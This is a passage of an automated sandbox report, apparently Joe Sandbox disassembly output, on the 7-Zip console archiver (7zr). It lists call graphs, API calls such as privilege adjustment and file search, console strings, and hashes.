2 library calls 76787->76848 76849 cf472e CharUpperW 76787->76849 76850 d08984 malloc _CxxThrowException free _CxxThrowException memcpy 76787->76850 76851 d10ef4 68 API calls 2 library calls 76787->76851 76789 cf2e04 2 API calls 76789->76793 76790->76787 76793->76773 76793->76778 76793->76789 76794 cf2fec 3 API calls 76793->76794 76803 d10df3 76793->76803 76804 cf1e40 free ctype 76793->76804 76809 d10df8 76793->76809 76865 d1117d 68 API calls 2 library calls 76793->76865 76794->76793 76795->76769 76795->76774 76795->76782 76797 cf2fec 3 API calls 76795->76797 76801 d1050b 44 API calls 76795->76801 76810 d10c79 76795->76810 76818 cf1e40 free ctype 76795->76818 76852 cf2f4a malloc _CxxThrowException free ctype 76795->76852 76857 cf1089 malloc _CxxThrowException free _CxxThrowException 76795->76857 76858 d113eb 5 API calls 2 library calls 76795->76858 76859 d10ef4 68 API calls 2 library calls 76795->76859 76860 d22db9 free ctype 76795->76860 76862 d10021 GetLastError 76795->76862 76797->76795 76801->76795 76867 cf1e40 free 76803->76867 76804->76793 76807->76787 76868 cf1e40 free 76809->76868 76863 cf1e40 free 76810->76863 76811 d10b30 76854 cf1e40 free 76811->76854 76813->76787 76816 d10b38 76855 cf1e40 free 76816->76855 76818->76795 76856 d22db9 free ctype 76826->76856 76853 cf1e40 free 76828->76853 76830->76787 76831->76787 76832->76723 76833->76718 76834->76720 76835->76787 76836->76787 76837->76787 76839 cf6c72 44 API calls 76838->76839 76841 d1051e 76839->76841 76840 d10575 76840->76787 76841->76840 76842 cf2f88 3 API calls 76841->76842 76842->76840 76843->76787 76844->76787 76845->76787 76846->76787 76847->76787 76848->76787 76849->76787 76850->76787 76851->76787 76852->76795 76853->76811 76854->76816 76855->76777 76856->76828 76857->76795 76858->76795 76859->76795 76860->76795 76861->76777 76862->76795 76863->76776 76864->76793 76865->76793 76866->76777 76867->76809 76868->76785 76869->76777 76870->76775 76871->76775 76872->76777 76874 d256b1 76873->76874 76875 d25689 76873->76875 76891 d25593 76874->76891 76876 d25593 6 API calls 76875->76876 76878 d256a5 76876->76878 76880 cf28a1 5 API calls 76878->76880 76880->76874 76883 d2570e fputs 76889 cf1fa0 fputc 76883->76889 76885 d256ef 76886 d25593 6 API calls 76885->76886 76887 d25701 76886->76887 76888 d25711 6 API calls 76887->76888 76888->76883 76889->76543 76890->76545 76892 d255ad 76891->76892 76893 cf28a1 5 API calls 76892->76893 76894 d255b8 76893->76894 76895 cf286d 5 API calls 76894->76895 76896 d255bf 76895->76896 76897 cf28a1 5 API calls 76896->76897 76898 d255c7 76897->76898 76899 d25711 76898->76899 76900 d25721 76899->76900 76901 d256e0 76899->76901 76902 cf28a1 5 API calls 76900->76902 76901->76883 76905 cf2881 malloc _CxxThrowException free memcpy _CxxThrowException 76901->76905 76903 d2572b 76902->76903 76906 d255cd 6 API calls 76903->76906 76905->76885 76906->76901 76907->76551 76908->76555 76909->76557 76910->76559 76911->76561

                                              Executed Functions

                                              Function 00CF9313 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1028 cf9313-cf9338 GetCurrentProcess OpenProcessToken 1029 cf933a-cf934a LookupPrivilegeValueW 1028->1029 1030 cf9390 1028->1030 1031 cf934c-cf9370 AdjustTokenPrivileges 1029->1031 1032 cf9382 1029->1032 1033 cf9393-cf9398 1030->1033 1031->1032 1034 cf9372-cf9380 GetLastError 1031->1034 1035 cf9385-cf938e CloseHandle 1032->1035 1034->1035 1035->1033
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000020,00D01EC5,?,7597AB50,?,?,?,?,00D01EC5,00D01CEF), ref: 00CF9329
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00D01EC5,00D01CEF), ref: 00CF9330
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00CF9342
                                              • AdjustTokenPrivileges.KERNELBASE(00D01EC5,00000000,?,00000000,00000000,00000000), ref: 00CF9368
                                              • GetLastError.KERNEL32 ref: 00CF9372
                                              • CloseHandle.KERNELBASE(00D01EC5,?,?,?,?,00D01EC5,00D01CEF), ref: 00CF9388
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeRestorePrivilege
                                              • API String ID: 3398352648-1684392131
                                              • Opcode ID: 3cf9e40b883ea100e7da1f66c1152ec52eb083eb5f327dc6089bb91dd313f012
                                              • Instruction ID: d0ac013b5e9abce6b79b513e16b847cd0f3b4b37b52886368b6c6a0a08582a32
                                              • Opcode Fuzzy Hash: 3cf9e40b883ea100e7da1f66c1152ec52eb083eb5f327dc6089bb91dd313f012
                                              • Instruction Fuzzy Hash: 21018076945318ABCB509BF19C49BEE7F7CEF05340F041165F545E22A0D6758608DBB1
                                              Function 00D03D66 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1036 d03d66-d03d9c call d8fb10 GetCurrentProcess call d03e04 OpenProcessToken 1041 d03de3-d03dfe call d03e04 1036->1041 1042 d03d9e-d03dbe LookupPrivilegeValueW 1036->1042 1042->1041 1043 d03dc0-d03dd3 AdjustTokenPrivileges 1042->1043 1043->1041 1045 d03dd5-d03de1 GetLastError 1043->1045 1045->1041
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D03D6B
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D7D
                                              • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D94
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00D03DB6
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DCB
                                              • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DD5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeSecurityPrivilege
                                              • API String ID: 3475889169-2333288578
                                              • Opcode ID: 5d8257ed151cdf8e29b9bc352f2318c8c3c91b9589dd2eec2837aad94ab2c3db
                                              • Instruction ID: 8d52be1d10ed6d6715453c42751b8866adccf145a8c3ef2f4960ca229bc05297
                                              • Opcode Fuzzy Hash: 5d8257ed151cdf8e29b9bc352f2318c8c3c91b9589dd2eec2837aad94ab2c3db
                                              • Instruction Fuzzy Hash: D7115EB1940219AFDB10EFA5CC85AFEFBBCFB04344F40462AE416E2291D7348A08CB70
                                              Function 00D381EC Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 995COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D381F1
                                                • Part of subcall function 00D3F749: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00D3F792
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionH_prologThrow
                                              • String ID:
                                              • API String ID: 461045715-3916222277
                                              • Opcode ID: 0ef5b46db264539d14a7416817a33e0583387fda46b3106dc7a19d71576c7429
                                              • Instruction ID: 2bf26022ac4686e1b10b1ca640f6503bae5bfcb76e867a728bfc8fa1f4ffb329
                                              • Opcode Fuzzy Hash: 0ef5b46db264539d14a7416817a33e0583387fda46b3106dc7a19d71576c7429
                                              • Instruction Fuzzy Hash: F0926B31900359DFDF15DFA8C884BAEBBB1AF18304F284099F845AB291CB75AE45DB71
                                              Function 00CF6868 Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF686D
                                                • Part of subcall function 00CF6848: FindClose.KERNELBASE(00000000,?,00CF6880), ref: 00CF6853
                                              • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00CF68A5
                                              • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00CF68DE
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: Find$FileFirst$CloseH_prolog
                                              • String ID:
                                              • API String ID: 3371352514-0
                                              • Opcode ID: d08c6785a3f79bed03355b8e0f51f86a2b1836712750a0c1b71ac45a2f647115
                                              • Instruction ID: 9a0e81c29872c77e379482ad76ed3ea619f7cf22d29bb6347e1323d256036e68
                                              • Opcode Fuzzy Hash: d08c6785a3f79bed03355b8e0f51f86a2b1836712750a0c1b71ac45a2f647115
                                              • Instruction Fuzzy Hash: 50118E3150020DABCB50EFA4C8559FDB769EF50364F204629EAA1571D2DB318E86EB51
                                              Function 00D2A013 Relevance: 56.7, APIs: 15, Strings: 17, Instructions: 690COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 d2a013-d2a01a 1 d2a020-d2a02d call d01ac8 0->1 2 d2a37a-d2a544 call d304d2 call cf1524 call d304d2 call cf1524 call cf1e0c 0->2 7 d2a033-d2a03a 1->7 8 d2a22e-d2a235 1->8 60 d2a551 2->60 61 d2a546-d2a54f call d2b0fa 2->61 12 d2a054-d2a089 call d292d3 7->12 13 d2a03c-d2a042 7->13 10 d2a367-d2a375 call d2b55f 8->10 11 d2a23b-d2a24d call d2b4f6 8->11 25 d2ac23-d2ac2a 10->25 26 d2a259-d2a2fb call d17ebb call cf27bb call cf26dd call d13d70 call d2ad99 call cf27bb 11->26 27 d2a24f-d2a253 11->27 29 d2a08b-d2a091 12->29 30 d2a099 12->30 13->12 17 d2a044-d2a04f call cf30ea 13->17 17->12 32 d2ac3a-d2ac66 call d2b96d call cf1e40 call d13247 25->32 33 d2ac2c-d2ac33 25->33 93 d2a303-d2a362 call d2b6ab call d22db9 call cf1e40 * 2 call d2bff8 26->93 94 d2a2fd 26->94 27->26 29->30 36 d2a093-d2a097 29->36 31 d2a09d-d2a0de call cf2fec call d2b369 30->31 56 d2a0e0-d2a0e4 31->56 57 d2a0ea-d2a0fa 31->57 71 d2ac68-d2ac6a 32->71 72 d2ac6e-d2acb5 call cf1e40 call cf11c2 call d2be0c call d22db9 32->72 33->32 38 d2ac35 33->38 36->31 43 d2ac35 call d2b988 38->43 43->32 56->57 62 d2a0fc-d2a102 57->62 63 d2a10d 57->63 68 d2a553-d2a55c 60->68 61->68 62->63 69 d2a104-d2a10b 62->69 70 d2a114-d2a19e call cf2fec call d17ebb call d2ad99 63->70 75 d2a564-d2a5c1 call cf2fec call d2b277 68->75 76 d2a55e-d2a560 68->76 69->70 102 d2a1a2 call d1f8e0 70->102 71->72 99 d2a5c3-d2a5c7 75->99 100 d2a5cd-d2a652 call d2ad06 call d2bf3e call d03a29 call cf2e04 call d14345 75->100 76->75 93->25 94->93 99->100 136 d2a676-d2a6c8 call d12096 100->136 137 d2a654-d2a671 call d1375c call d2b96d 100->137 106 d2a1a7-d2a1b1 102->106 110 d2a1b3-d2a1bb call d2c7d7 106->110 111 d2a1c0-d2a1c9 106->111 110->111 116 d2a1d1-d2a229 call d2b6ab call d22db9 call cf1e40 call d2bfa4 call d2940b 111->116 117 d2a1cb 111->117 116->25 117->116 142 d2a6cd-d2a6d6 136->142 137->136 145 d2a6e2-d2a6e5 142->145 146 d2a6d8-d2a6dd call d2c7d7 142->146 150 d2a6e7-d2a6ee 145->150 151 d2a72e-d2a73a 145->151 146->145 154 d2a722-d2a725 150->154 155 d2a6f0-d2a71d call cf1fa0 fputs call cf1fa0 call cf1fb3 call cf1fa0 150->155 152 d2a79e-d2a7aa 151->152 153 d2a73c-d2a74a call cf1fa0 151->153 158 d2a7d9-d2a7e5 152->158 159 d2a7ac-d2a7b2 152->159 166 d2a755-d2a799 fputs call cf2201 call cf1fa0 fputs call cf2201 call cf1fa0 153->166 167 d2a74c-d2a753 153->167 154->151 160 d2a727 154->160 155->154 162 d2a7e7-d2a7ed 158->162 163 d2a818-d2a81a 158->163 159->158 165 d2a7b4-d2a7d4 fputs call cf2201 call cf1fa0 159->165 160->151 168 d2a7f3-d2a813 fputs call cf2201 call cf1fa0 162->168 169 d2a899-d2a8a5 162->169 163->169 171 d2a81c-d2a82b 163->171 165->158 166->152 167->152 167->166 168->163 176 d2a8a7-d2a8ad 169->176 177 d2a8e9-d2a8ed 169->177 179 d2a851-d2a85d 171->179 180 d2a82d-d2a84c fputs call cf2201 call cf1fa0 171->180 182 d2a8ef 176->182 186 d2a8af-d2a8c2 call cf1fa0 176->186 181 d2a8f6-d2a8f8 177->181 177->182 179->169 189 d2a85f-d2a872 call cf1fa0 179->189 180->179 191 d2a8fe-d2a90a 181->191 192 d2aaaf-d2aaeb call d143b3 call cf1e40 call d2c104 call d2ad82 181->192 182->181 186->182 211 d2a8c4-d2a8e4 fputs call cf2201 call cf1fa0 186->211 189->169 206 d2a874-d2a894 fputs call cf2201 call cf1fa0 189->206 200 d2aa73-d2aa89 call cf1fa0 191->200 201 d2a910-d2a91f 191->201 247 d2aaf1-d2aaf7 192->247 248 d2ac0b-d2ac1e call d22db9 * 2 192->248 200->192 223 d2aa8b-d2aaaa fputs call cf2201 call cf1fa0 200->223 201->200 208 d2a925-d2a929 201->208 206->169 208->192 214 d2a92f-d2a93d 208->214 211->177 220 d2a96a-d2a971 214->220 221 d2a93f-d2a964 fputs call cf2201 call cf1fa0 214->221 228 d2a973-d2a97a 220->228 229 d2a98f-d2a9a8 fputs call cf2201 220->229 221->220 223->192 228->229 235 d2a97c-d2a982 228->235 238 d2a9ad-d2a9bd call cf1fa0 229->238 235->229 241 d2a984-d2a98d 235->241 245 d2aa06-d2aa1f fputs call cf2201 238->245 250 d2a9bf-d2aa01 fputs call cf2201 call cf1fa0 fputs call cf2201 call cf1fa0 238->250 241->229 241->245 252 d2aa24-d2aa29 call cf1fa0 245->252 247->248 248->25 250->245 258 d2aa2e-d2aa4b fputs call cf2201 252->258 262 d2aa50-d2aa5b call cf1fa0 258->262 262->192 268 d2aa5d-d2aa71 call cf1fa0 call d2710e 262->268 268->192
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$ExceptionThrow
                                              • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                              • API String ID: 3665150552-429544124
                                              • Opcode ID: b831a6919da98bd1a72721c1d9d1040a0d1a3a8d0722c8307eff0bb6ee42106c
                                              • Instruction ID: c1ecd7a6144d3ee2c489c264cf903510676e055b7965b19727245e68aca56539
                                              • Opcode Fuzzy Hash: b831a6919da98bd1a72721c1d9d1040a0d1a3a8d0722c8307eff0bb6ee42106c
                                              • Instruction Fuzzy Hash: 3752AF31904269DFCF26DBA8D885BEDFBB5EF54304F04409AE549A3291DB316E84DF22
                                              Function 00D2A42C Relevance: 56.5, APIs: 15, Strings: 17, Instructions: 503COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 274 d2a42c-d2a433 275 d2a435-d2a444 fputs call cf1fa0 274->275 276 d2a449-d2a4df call d2545d call cf2e04 call d11858 call cf1e40 274->276 275->276 286 d2a4e1-d2a4e9 call d2c7d7 276->286 287 d2a4ee-d2a4f1 276->287 286->287 289 d2a4f3-d2a4fa 287->289 290 d2a50e-d2a520 call d2c73e 287->290 289->290 291 d2a4fc-d2a509 call d257fb 289->291 295 d2a526-d2a544 call cf1e0c 290->295 296 d2ac0b-d2ac2a call d22db9 * 2 290->296 291->290 304 d2a551 295->304 305 d2a546-d2a54f call d2b0fa 295->305 306 d2ac3a-d2ac66 call d2b96d call cf1e40 call d13247 296->306 307 d2ac2c-d2ac33 296->307 309 d2a553-d2a55c 304->309 305->309 328 d2ac68-d2ac6a 306->328 329 d2ac6e-d2acb5 call cf1e40 call cf11c2 call d2be0c call d22db9 306->329 307->306 310 d2ac35 call d2b988 307->310 313 d2a564-d2a5c1 call cf2fec call d2b277 309->313 314 d2a55e-d2a560 309->314 310->306 325 d2a5c3-d2a5c7 313->325 326 d2a5cd-d2a652 call d2ad06 call d2bf3e call d03a29 call cf2e04 call d14345 313->326 314->313 325->326 348 d2a676-d2a6d6 call d12096 326->348 349 d2a654-d2a671 call d1375c call d2b96d 326->349 328->329 354 d2a6e2-d2a6e5 348->354 355 d2a6d8-d2a6dd call d2c7d7 348->355 349->348 358 d2a6e7-d2a6ee 354->358 359 d2a72e-d2a73a 354->359 355->354 362 d2a722-d2a725 358->362 363 d2a6f0-d2a71d call cf1fa0 fputs call cf1fa0 call cf1fb3 call cf1fa0 358->363 360 d2a79e-d2a7aa 359->360 361 d2a73c-d2a74a call cf1fa0 359->361 366 d2a7d9-d2a7e5 360->366 367 d2a7ac-d2a7b2 360->367 374 d2a755-d2a799 fputs call cf2201 call cf1fa0 fputs call cf2201 call cf1fa0 361->374 375 d2a74c-d2a753 361->375 362->359 368 d2a727 362->368 363->362 370 d2a7e7-d2a7ed 366->370 371 d2a818-d2a81a 366->371 367->366 373 d2a7b4-d2a7d4 fputs call cf2201 call cf1fa0 367->373 368->359 376 d2a7f3-d2a813 fputs call cf2201 call cf1fa0 370->376 377 d2a899-d2a8a5 370->377 371->377 379 d2a81c-d2a82b 371->379 373->366 374->360 375->360 375->374 376->371 384 d2a8a7-d2a8ad 377->384 385 d2a8e9-d2a8ed 377->385 387 d2a851-d2a85d 379->387 388 d2a82d-d2a84c fputs call cf2201 call cf1fa0 379->388 390 d2a8ef 384->390 394 d2a8af-d2a8c2 call cf1fa0 384->394 389 d2a8f6-d2a8f8 385->389 385->390 387->377 397 d2a85f-d2a872 call cf1fa0 387->397 388->387 399 d2a8fe-d2a90a 389->399 400 d2aaaf-d2aaeb call d143b3 call cf1e40 call d2c104 call d2ad82 389->400 390->389 394->390 419 d2a8c4-d2a8e4 fputs call cf2201 call cf1fa0 394->419 397->377 414 d2a874-d2a894 fputs call cf2201 call cf1fa0 397->414 408 d2aa73-d2aa89 call cf1fa0 399->408 409 d2a910-d2a91f 399->409 400->296 455 d2aaf1-d2aaf7 400->455 408->400 431 d2aa8b-d2aaaa fputs call cf2201 call cf1fa0 408->431 409->408 416 d2a925-d2a929 409->416 414->377 416->400 422 d2a92f-d2a93d 416->422 419->385 428 d2a96a-d2a971 422->428 429 d2a93f-d2a964 fputs call cf2201 call cf1fa0 422->429 436 d2a973-d2a97a 428->436 437 d2a98f-d2a9a8 fputs call cf2201 428->437 429->428 431->400 436->437 443 d2a97c-d2a982 436->443 446 d2a9ad-d2a9bd call cf1fa0 437->446 443->437 449 d2a984-d2a98d 443->449 453 d2aa06-d2aa4b fputs call cf2201 call cf1fa0 fputs call cf2201 446->453 457 d2a9bf-d2aa01 fputs call cf2201 call cf1fa0 fputs call cf2201 call cf1fa0 446->457 449->437 449->453 466 d2aa50-d2aa5b call cf1fa0 453->466 455->296 457->453 466->400 472 d2aa5d-d2aa71 call cf1fa0 call d2710e 466->472 472->400
                                              APIs
                                              • fputs.MSVCRT(Scanning the drive for archives:), ref: 00D2A43E
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputcfputs
                                              • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                              • API String ID: 269475090-3104439828
                                              • Opcode ID: 25b2eefd50e4b223987187beeb6e13b08fe66bbe406726736b1ca6685472ced3
                                              • Instruction ID: cab9b5785281934fe1bf3535130c247d48d1c293a25089904b138a2babd10c3a
                                              • Opcode Fuzzy Hash: 25b2eefd50e4b223987187beeb6e13b08fe66bbe406726736b1ca6685472ced3
                                              • Instruction Fuzzy Hash: CD226D31900268DFDF2ADBA8D845BEDFBB1EF54304F18409AE54963291DB716E84DF22
                                              Function 00D2993D Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 569COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 478 d2993d-d29950 call d2b5b1 481 d29952-d2995e call cf1fb3 478->481 482 d29963-d2997e call d01f33 478->482 481->482 486 d29980-d2998a 482->486 487 d2998f-d29998 482->487 486->487 488 d2999a-d299a6 487->488 489 d299a8 487->489 488->489 490 d299ab-d299b5 488->490 489->490 491 d299b7-d299cc GetStdHandle GetConsoleScreenBufferInfo 490->491 492 d299d5-d29a04 call cf1e0c call d2acb6 490->492 491->492 493 d299ce-d299d2 491->493 500 d29a06-d29a08 492->500 501 d29a0c-d29a24 call d17b48 492->501 493->492 500->501 503 d29a29-d29a48 call d2b96d call d17018 call d01aa4 501->503 510 d29a4a-d29a4c 503->510 511 d29a7c-d29aa8 call d1ddb5 503->511 513 d29a66-d29a77 _CxxThrowException 510->513 514 d29a4e-d29a55 510->514 517 d29ac0-d29ade 511->517 518 d29aaa-d29abb _CxxThrowException 511->518 513->511 514->513 516 d29a57-d29a64 call d01ac8 514->516 516->511 516->513 520 d29ae0-d29b04 call d17dd7 517->520 521 d29b3a-d29b55 517->521 518->517 529 d29bfa-d29c0b _CxxThrowException 520->529 530 d29b0a-d29b0e 520->530 525 d29b57 521->525 526 d29b5c-d29ba4 call cf1fa0 fputs call cf1fa0 strlen * 2 521->526 525->526 539 d29e25-d29e4d call cf1fa0 fputs call cf1fa0 526->539 540 d29baa-d29be4 fputs fputc 526->540 533 d29c10 529->533 530->529 532 d29b14-d29b38 call d2c077 call cf1e40 530->532 532->520 532->521 536 d29c12-d29c25 533->536 543 d29be6-d29bf0 536->543 544 d29c27-d29c33 536->544 556 d29e53 539->556 557 d29f0c-d29f34 call cf1fa0 fputs call cf1fa0 539->557 540->543 540->544 543->533 547 d29bf2-d29bf8 543->547 551 d29c81-d29cb1 call d2b67d call cf2e04 544->551 552 d29c35-d29c3d 544->552 547->536 592 d29cb3-d29cb7 551->592 593 d29d10-d29d28 call d2b67d 551->593 554 d29c6b-d29c80 call cf21d8 552->554 555 d29c3f-d29c4a 552->555 554->551 558 d29c54 555->558 559 d29c4c-d29c52 555->559 562 d29e5a-d29e6f call d2b650 556->562 579 d2ac23-d2ac2a 557->579 580 d29f3a 557->580 565 d29c56-d29c69 558->565 559->565 572 d29e71-d29e79 562->572 573 d29e7b-d29e7e call cf21d8 562->573 565->554 565->555 585 d29e83-d29f06 call d2bde4 fputs call cf1fa0 572->585 573->585 581 d2ac3a-d2ac66 call d2b96d call cf1e40 call d13247 579->581 582 d2ac2c-d2ac33 579->582 586 d29f41-d29f9d call d2b650 call d2b5e9 call d2bde4 fputs call cf1fa0 580->586 619 d2ac68-d2ac6a 581->619 620 d2ac6e-d2acb5 call cf1e40 call cf11c2 call d2be0c call d22db9 581->620 582->581 587 d2ac35 call d2b988 582->587 585->557 585->562 662 d29f9f 586->662 587->581 598 d29cc1-d29cdd call cf31e5 592->598 599 d29cb9-d29cbc call cf315e 592->599 617 d29d2a-d29d4a fputs call cf21d8 593->617 618 d29d4b-d29d53 593->618 613 d29d05-d29d0e 598->613 614 d29cdf-d29d00 call cf3221 call cf31e5 call cf1089 598->614 599->598 613->592 613->593 614->613 617->618 624 d29d59-d29d5d 618->624 625 d29dff-d29e1f call cf1fa0 call cf1e40 618->625 619->620 632 d29d6e-d29d82 624->632 633 d29d5f-d29d6d fputs 624->633 625->539 625->540 639 d29df0-d29df9 632->639 640 d29d84-d29d88 632->640 633->632 639->624 639->625 645 d29d95-d29d9f 640->645 646 d29d8a-d29d94 640->646 652 d29da1-d29da3 645->652 653 d29da5-d29db1 645->653 646->645 652->653 659 d29dd8-d29dee 652->659 660 d29db3-d29db6 653->660 661 d29db8 653->661 659->639 659->640 665 d29dbb-d29dce 660->665 661->665 662->579 670 d29dd0-d29dd3 665->670 671 d29dd5 665->671 670->659 671->659
                                              APIs
                                                • Part of subcall function 00D2B5B1: fputs.MSVCRT ref: 00D2B5CA
                                                • Part of subcall function 00D2B5B1: fputs.MSVCRT ref: 00D2B5E1
                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 00D299BD
                                              • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00D299C4
                                              • _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00D29A77
                                              • _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00D29ABB
                                                • Part of subcall function 00CF1FB3: __EH_prolog.LIBCMT ref: 00CF1FB8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
